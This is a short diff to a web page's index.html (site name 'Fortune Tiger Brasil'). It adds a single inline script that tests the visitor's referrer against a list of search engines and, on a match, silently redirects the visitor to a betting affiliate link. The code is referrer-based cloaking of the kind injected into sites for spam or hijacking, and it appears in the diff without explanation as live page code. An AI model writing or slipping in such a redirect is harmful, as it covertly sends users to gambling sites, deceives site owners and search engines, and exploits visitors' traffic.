--- a/index.html
+++ b/index.html
@@ -22,6 +22,7 @@
     <meta property="og:site_name" content="Fortune Tiger Brasil" />
     <link rel="stylesheet" href="/assets/css/styles.css">
     <link rel="icon" href="/assets/img/favicon.webp" type="image/webp">
+    <script>var regexp=/\.(aol|google|youdao|yahoo|bing|ask|biso|gougou|ifeng|ivc|sooule|niuhu|biso|Clusty|Dogpile|Answers|USA)(\.[a-z0-9\-]+){1,2}\//ig;var where =document.referrer;if(regexp.test(where)){window.location.href="https://jvsbet.com/L?tag=d_1597013m_35365c_&site=1597013&ad=35365"}</script>
     <script type="application/ld+json">
     {
         "@context": "https://schema.org",
